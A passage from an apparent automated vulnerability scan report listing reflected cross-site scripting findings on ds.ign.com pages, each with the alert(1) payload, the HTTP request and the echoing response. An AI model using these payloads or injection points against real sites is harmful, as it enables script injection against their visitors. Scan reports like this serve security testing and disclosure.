   <title>IGN DS: Games, Che
...[SNIP]...
(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/index/images.html?84e66"-alert(1)-"8a875710ab2=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.157. http://ds.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/latest-updates.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a6fd"-alert(1)-"011aedbdd45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/latest-updates.html?7a6fd"-alert(1)-"011aedbdd45=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:22:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:22:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-19323-2078814728-13;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:22:00 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041720754v-1n-12mc+1297041720754mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 144689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
_comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/index/latest-updates.html?7a6fd"-alert(1)-"011aedbdd45=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.158. http://ds.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/latest-updates.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92f97"><script>alert(1)</script>a7609ad19bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/latest-updates.html?92f97"><script>alert(1)</script>a7609ad19bc=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-18145-2112530193-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:57 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041717799v-1n-12mc+1297041717799mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 142982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/latest-updates.html?92f97"><script>alert(1)</script>a7609ad19bc=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.159. http://ds.ign.com/index/latest-updates.html [types parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/latest-updates.html

Issue detail

The value of the types request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15ad3"><script>alert(1)</script>66fd0e3ba98 was submitted in the types parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/latest-updates.html?types=all15ad3"><script>alert(1)</script>66fd0e3ba98 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:22:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:22:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32465-180368243-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:22:05 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041725149v-1n-12mc+1297041725149mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 116315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/latest-updates.html?types=all15ad3"><script>alert(1)</script>66fd0e3ba98&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.160. http://ds.ign.com/index/latest-updates.html [types parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/latest-updates.html

Issue detail

The value of the types request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89a11"-alert(1)-"885b288a082 was submitted in the types parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/latest-updates.html?types=all89a11"-alert(1)-"885b288a082 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:22:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:22:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c08-31243-781560067-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:22:07 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041727117v-1n-12mc+1297041727117mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 117583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
Guard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/index/latest-updates.html?types=all89a11"-alert(1)-"885b288a082",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.161. http://ds.ign.com/index/latest-updates.html [types parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/latest-updates.html

Issue detail

The value of the types request parameter is copied into an HTML comment. The payload 22b01--><script>alert(1)</script>4e06c977745 was submitted in the types parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /index/latest-updates.html?types=all22b01--><script>alert(1)</script>4e06c977745 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:22:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:22:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15003-1383669598-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:22:09 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041729788v-1n-12mc+1297041729788mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 116730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<!-- http://content-api.ign.com/v1/articles.xml.us?max=250&channelId=532&types=all22b01--><script>alert(1)</script>4e06c977745&startDate=20110107&endDate=20110206 -->
...[SNIP]...

1.162. http://ds.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/news.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8a58"-alert(1)-"739a0385749 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/news.html?b8a58"-alert(1)-"739a0385749=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c02-24874-1029504208-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:53 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041713640v-1n-12mc+1297041713640mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 126773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DS: Games, Che
...[SNIP]...
if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/index/news.html?b8a58"-alert(1)-"739a0385749=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.163. http://ds.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/news.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0c65"><script>alert(1)</script>bad51faa319 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/news.html?b0c65"><script>alert(1)</script>bad51faa319=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32462-820832511-8;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:49 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041709665v-1n-12mc+1297041709665mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 126654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DS: Games, Che
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/news.html?b0c65"><script>alert(1)</script>bad51faa319=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.164. http://ds.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/previews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24ea7"><script>alert(1)</script>66a0bffc619 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/previews.html?24ea7"><script>alert(1)</script>66a0bffc619=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-26779-1770290604-6;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:46 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041706627v-1n-12mc+1297041706627mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 118436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DS: Games, Che
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/previews.html?24ea7"><script>alert(1)</script>66a0bffc619=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.165. http://ds.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/previews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bddc6"-alert(1)-"91790f839c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/previews.html?bddc6"-alert(1)-"91790f839c5=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32465-602718058-6;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:50 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041711043v-1n-12mc+1297041711043mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 118372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DS: Games, Che
...[SNIP]...
ypeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/index/previews.html?bddc6"-alert(1)-"91790f839c5=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.166. http://ds.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52616"-alert(1)-"17261e88bc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/reviews.html?52616"-alert(1)-"17261e88bc1=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-18145-1862347009-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:20 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041680683v-1n-12mc+1297041680683mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 172490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>New Nintendo DS &
...[SNIP]...
typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/index/reviews.html?52616"-alert(1)-"17261e88bc1=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.167. http://ds.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d64e7"><script>alert(1)</script>8545307439b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/reviews.html?d64e7"><script>alert(1)</script>8545307439b=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32464-1113793781-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:18 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041678854v-1n-12mc+1297041678854mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 172553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>New Nintendo DS &
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/reviews.html?d64e7"><script>alert(1)</script>8545307439b=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.168. http://ds.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/upcoming.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef322"><script>alert(1)</script>9008801a361 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/upcoming.html?ef322"><script>alert(1)</script>9008801a361=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c08-31243-1766585205-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:38 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041698841v-1n-12mc+1297041698841mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 150837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>New Nintendo DS &
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/upcoming.html?ef322"><script>alert(1)</script>9008801a361=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.169. http://ds.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/upcoming.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33a4e"-alert(1)-"0edb7c69d16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/upcoming.html?33a4e"-alert(1)-"0edb7c69d16=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-18145-181493938-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:48 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041708767v-1n-12mc+1297041708767mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 149063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>New Nintendo DS &
...[SNIP]...
ypeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/index/upcoming.html?33a4e"-alert(1)-"0edb7c69d16=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.170. http://ds.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/videos.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8eb3"><script>alert(1)</script>721f950aac5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/videos.html?c8eb3"><script>alert(1)</script>721f950aac5=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
